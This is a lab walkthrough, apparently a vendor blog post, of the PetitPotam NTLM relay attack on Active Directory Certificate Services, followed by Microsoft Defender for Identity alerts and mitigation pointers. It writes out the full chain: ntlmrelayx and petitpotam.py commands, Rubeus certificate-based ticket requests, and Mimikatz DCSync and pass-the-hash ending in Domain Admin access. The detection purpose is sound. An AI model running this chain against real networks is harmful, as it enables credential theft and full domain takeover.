PetitPotam…from attack to detection via Microsoft Defender for Identity (MDI)

PetitPotam is a NTLM relay attack on Active Directory Certificate Services (AD CS) HTTP Endpoints. If the following AD CA services are installed the Active Directory is vulnerable to the attack.

See KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) for more information how to mitigate.

The attack

The Domain Controllers have the latest Microsoft 365 Defender for Identity (MDI) sensors installed.

PSPKIAudit

Import-Module .\PSPKIAudit.psm1
Invoke-PKIAudit -CAComputerName WSRV2016-DC01.s3cur1ty.local

PetitPotam

An attacker can target a Domain Controller (WSRV2016-DC02; 192.168.178.11) and relay DC NTLM credentials to the Active Directory Certificate Services (AD CA) Web enrollment pages to enroll a DC certificate.

NTLMRelayx

Keep in mind to add the pull request to use the extension --adcs to exploit the AD CS vulnerability (the ‘--adcs’ option not available in the latest version of Impacket).

python3 ntlmrelayx.py -t http://192.168.178.10/certsrv/certfnsh.asp -smb2support --adcs

after NtlmRelayx is started, run PetitPotam (from the example above) to the 2nd domain controller (WSRV2016-DC02 send machine credentials to Kali Linux).

python3 petitpotam.py 192.168.178.49 192.168.178.11

Authenticating to http://192.168.178.10 as S3CUR1TY/WSRV2016-DC02$ succeeded, a CSR is generated and a Base64 certificate is created of user S3CUR1TY/WSRV2016-DC02$.

We can see the issued Certificate in the Certification Authority application on the AD CA.

Rubeus

Rubeus.exe asktgt /user:WSRV2016-DC02$ /certificate:<base64-certificate> /ptt

Keep in mind to use the latest version of Rubeus for /certificate parameter support.

With klist we can see the cached Kerberos ticket(s) on the local machine with privileges for DCSync.

MimiKatz — DCSync

lsadump::dcsync /domain:s3cur1ty.local /all /csv

The output is the NTLM hash of a Domain Admin (SID ends with 512) account (e.g. Administrator in our example).

MimiKatz — Pass the hash

Before PTH we don’t have access to the Domain Controller.

privilege::debug
sekurlsa::pth /user:Administrator /domain:s3cur1ty.local /ntlm:6cff5d10edb2c4…

The command prompt (cmd.exe) has Domain Admin privileges and we can access the Domain Controller.

And …GAME OVER :-)

Microsoft Defender for Identity

Microsoft Defender for Identity version 2.158.14362 detects the PetitPotam attack on Active Directory Certificate Services. The alert is Suspicious network connection over Encrypting File System Remote Protocol

The DCSync attack is also detected by Microsoft Defender for Identity.

Microsoft 365 Defender

Microsoft 365 Defender provides a protection layer (IPC, MDI, MDE, MDO & MCAS) over all assets of the Modern Workplace (Identity, Devices, Apps & Data).

Defense in-depth or zero trust is the most practical approach against new (0-day) attacks, even if some detections capabilities are not yet implemented.

Mitigation

Or remove the Certificate Enrollment Web Service completely if not required.

Chief Technology Officer @ Nedscaper